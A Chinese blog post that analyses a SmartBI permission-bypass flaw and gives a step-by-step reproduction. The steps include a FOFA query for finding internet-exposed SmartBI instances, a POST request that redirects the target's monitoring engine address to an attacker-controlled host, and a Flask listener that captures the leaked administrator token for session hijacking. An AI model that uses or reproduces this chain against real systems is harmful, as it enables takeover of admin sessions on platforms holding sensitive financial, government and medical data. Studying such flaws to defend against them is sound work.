当前位置：首页 > news >正文

SmartBI 权限绕过漏洞深度剖析与实战复现

news 2026/5/23 16:10:36

1. SmartBI权限绕过漏洞背景解析

第一次听说SmartBI这个产品是在一次企业内网渗透测试中。客户使用的正是这款号称"一站式大数据分析平台"的商业软件，当时我就注意到它的权限控制机制存在一些可疑的设计缺陷。后来在安全圈子里陆续看到有人讨论相关漏洞，直到最近终于有机会深入研究这个权限绕过的完整利用链。

SmartBI作为国内主流商业BI工具，广泛应用于金融、政务、医疗等领域。它本质上是一个数据中台，能够连接各类数据库和数据仓库，提供可视化报表、即席查询等功能。根据官方文档描述，其架构分为前端展示层、业务逻辑层和数据访问层，而漏洞恰恰出现在业务逻辑层的API接口设计中。

2. 漏洞原理深度剖析

2.1 核心问题：Token生成机制缺陷

这个漏洞的根源在于SmartBI的监控模块API设计缺陷。监控模块本应只对管理员开放，但系统却错误地将/smartbi/smartbix/api/monitor/下的接口暴露给了普通用户。更致命的是，其中的token接口可以直接返回当前会话的管理员Token。

我通过反编译SmartBI的Java代码发现，监控模块的鉴权检查存在逻辑漏洞。当请求/monitor/token时，系统会直接调用Session.getCurrentUserToken()方法，而该方法不会验证调用者身份。这就好比小区门禁系统虽然需要刷卡进入，但任何人都可以在保安亭直接拿到物业经理的门禁卡。

2.2 漏洞利用链分析

完整的攻击路径可以分为三个阶段：

引擎地址劫持：通过setEngineAddress接口将监控引擎地址指向攻击者控制的服务器
Token窃取：诱导系统向恶意服务器发送包含管理员Token的请求
会话伪造：使用窃取的Token通过login接口建立管理员会话

这个过程中最精妙的是第二步。当监控引擎地址被修改后，SmartBI服务端会主动向攻击者的服务器发送监控数据，而其中就包含珍贵的会话Token。这种"主动送上门"的数据泄露方式在Web漏洞中相当罕见。

3. 漏洞复现实战演示

3.1 环境搭建要点

为了完整复现这个漏洞，我建议使用以下环境配置：

SmartBI V9.5（漏洞影响最广的版本）
Kali Linux作为攻击机
Python3 + Flask搭建恶意监控服务器

关键配置项需要注意：

# SmartBI的默认监控端口为8000 monitor.port=8000 # 必须关闭SSL验证才能成功劫持 monitor.ssl.verify=false

3.2 分步攻击演示

第一步：识别目标系统使用FOFA搜索引擎查找暴露在公网的SmartBI实例：

fofa-cli -q 'app="SMARTBI"' -size 100

第二步：引擎地址劫持发送恶意POST请求修改引擎地址：

POST /smartbi/smartbix/api/monitor/setEngineAddress HTTP/1.1 Host: target.com Content-Type: application/json {"address":"http://attacker-ip:8000"}

第三步：启动恶意监控服务用Python快速搭建一个接收Token的服务器：

from flask import Flask, request app = Flask(__name__) @app.route('/', methods=['POST']) def handle_token(): token = request.json.get('token') print(f"[+] 获取到管理员Token: {token}") return {"status": "success"} if __name__ == '__main__': app.run(host='0.0.0.0', port=8000)

第四步：触发Token泄露等待目标系统自动连接你的服务器，通常不超过5分钟。当看到控制台输出Token时，就可以进行最后一步的会话劫持了。